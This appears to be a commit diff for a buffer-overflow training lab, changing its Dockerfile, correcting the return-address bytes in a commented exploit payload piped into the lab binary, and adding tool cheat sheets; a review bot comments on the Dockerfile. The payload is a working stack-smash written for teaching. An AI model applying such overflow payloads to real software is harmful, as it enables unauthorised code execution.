docs
parent
5f83e809ab
commit
fe453841be
@ -4,7 +4,6 @@ RUN mkdir /lab
|
|||||||
|
|
||||||
RUN bash -c "chmod +rwx /lab"
|
RUN bash -c "chmod +rwx /lab"
|
||||||
|
|
||||||
COPY Makefile /lab/Makefile
|
|
||||||
COPY bof.elf /lab/bof.elf
|
COPY bof.elf /lab/bof.elf
|
||||||
COPY bof.s /lab/bof.s
|
COPY bof.s /lab/bof.s
|
||||||
|
|
||||||
@ -15,6 +14,7 @@ RUN DEBIAN_FRONTEND=noninteractive apt install --yes curl sudo openssh-server ra
|
|||||||
RUN curl https://gist.githubusercontent.com/bfu4/c8d252f36c9aeb30d98a133e1cf922e3/raw/ae93e86e910deef429716daf325552f1d74bb82b/iuadd --output /usr/local/bin/iuadd
|
RUN curl https://gist.githubusercontent.com/bfu4/c8d252f36c9aeb30d98a133e1cf922e3/raw/ae93e86e910deef429716daf325552f1d74bb82b/iuadd --output /usr/local/bin/iuadd
|
||||||
RUN chmod +x /usr/local/bin/iuadd
|
RUN chmod +x /usr/local/bin/iuadd
|
||||||
|
|
||||||
|
RUN cd lab
|
||||||
|
|
||||||
EXPOSE 22/tcp
|
EXPOSE 22/tcp
|
||||||
|
|
||||||
|
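Review bot: The added `RUN cd lab` has no effect on anything after it, because each `RUN` instruction runs in its own shell and the directory change is discarded when that layer finishes; if the goal is for later instructions and the container's default working directory to be the lab folder, replace it with `WORKDIR /lab`. The path is also relative, so it only resolves to `/lab` while the build's working directory is still `/`. The Dockerfile continues outside this hunk, so whether a later instruction depends on the working directory is not visible here. Separately, the unchanged `curl … --output /usr/local/bin/iuadd` line just above is pinned to a gist revision but lacks `--fail`, so an HTTP error body would be saved and then marked executable; adding `--fail` and a checksum comparison before the `chmod +x` would be a worthwhile follow-up.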
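--- a/bof.s
+++ b/bof.s
@@ -46,7 +46,7 @@
 # |---|---|---|---|---|---|---|---|----|----|----|----|----|----|----|----| #
 # | / | / | / | / | / | / | / | / | 61 | 61 | 61 | 61 | 61 | 61 | 61 | 61 | #
 # |---|---|---|---|---|---|---|---|----|----|----|----|----|----|----|----| #
-# | x | x | x | x | x | x | x | x | 6a | 11 | 40 | 00 | <-- saved bp (1) | #
+# | x | x | x | x | x | x | x | x | 63 | 10 | 40 | 00 | <-- saved bp (1) | #
 # |___|___|___|___|___|___|___|___|____|____|____|____|___________________| #
 # #
 # Since we don't really care what is in the memory where the x's are, we can put anything there. We want #
@@ -55,9 +55,9 @@
 # follow that format. Instead of writing {0x40, 0x10, 0x47} to stdin, we will write {0x47, 0x10, 0x40} to #
 # be able to write 0x401047 (the address we want to jump to). #
 #
-# This allows us to craft the final payload: "aaaaaaaaaaaaaaaa\x47\x11\x40". #
+# This allows us to craft the final payload: "aaaaaaaaaaaaaaaa\x47\x10\x40". #
 #---------------------------------------------------------------------------------------------------------------#
-# Execution: bash -c 'printf "aaaaaaaaaaaaaaaa\x47\x11\x40" | ./bof.elf' #
+# Execution: bash -c 'printf "aaaaaaaaaaaaaaaa\x47\x10\x40" | ./bof.elf' #
 #---------------------------------------------------------------#-----------------------------------------------#
 nop # #
 leave # END OF FUNCTION #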
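--- a/docs/commands.txt
+++ b/docs/commands.txt
@@ -0,0 +1,42 @@
+= PROGRAMS
+
++-------------------------------------------------------------------------------+
+| program | flags | args | description |
++---------------|---------------|---------------|-------------------------------+
+| rabin2 | -Ss | ./bof.elf | get symbol information |
+| | | | like function addresses |
++---------------|---------------|---------------|-------------------------------+
+| r2 | -wAAf | ./bof.elf | analyze a binary (static) |
++---------------|---------------|---------------|-------------------------------+
+| cat | | ./bof.s | read the contents of the |
+| | | | source file |
++---------------|---------------|---------------|-------------------------------+
+| objdump | -d | ./bof.elf | disassemble a binary |
++---------------|---------------|---------------|-------------------------------+
+| grep | -e | string | grab text where a string |
+| | | | occurs, non case sensitive |
++---------------|---------------|---------------|-------------------------------|
+| curl | | url | get an http response from |
+| | | | from the provided url and |
+| | | | output to stdout or a file |
+| | | | via the --output=file flag |
++---------------|---------------|---------------|-------------------------------+
+| printf | | string | print the provided string |
++---------------|---------------|---------------|-------------------------------+
+| chmod | +x | ./bof.elf | add execute permission |
++---------------|---------------|---------------|-------------------------------|
+| lldb | | ./bof.elf | execute the program to debug |
++-------------------------------------------------------------------------------+
+
+= UTILITIES
+
++-------------------------------------------------------------------------------+
+| characters (s) | format | use case |
++-----------------------|-----------------------|-------------------------------+
+| | (pipe) | cmd1 | cmd2 | "pipe" the output from cmd1 |
+| | | into input for cmd2 |
++-----------------------|-----------------------|-------------------------------+
+| ./ | ./<file> | execute a LOCAL (accessable |
+| | | from the current working |
+| | | directory) file. |
++-------------------------------------------------------------------------------+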
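--- a/docs/help.txt
+++ b/docs/help.txt
@@ -0,0 +1,21 @@
+= HELP
+
+Feeling stuck? There's actually a cheatsheet!
+
+
+Command Cheatsheet: <url-here>
+Binary Source Code: <url-here>
+
+To get the files, run:
+
+curl <url> --output <name-your-file-here>
+
+For example:
+
++-------------------------------------------------------+
+| curl <url>/bof.s --output ./bof.s |
+| |
+| and |
+| |
+| curl <url>/cheatsheet.txt --output ./cheatsheet.txt |
++-------------------------------------------------------+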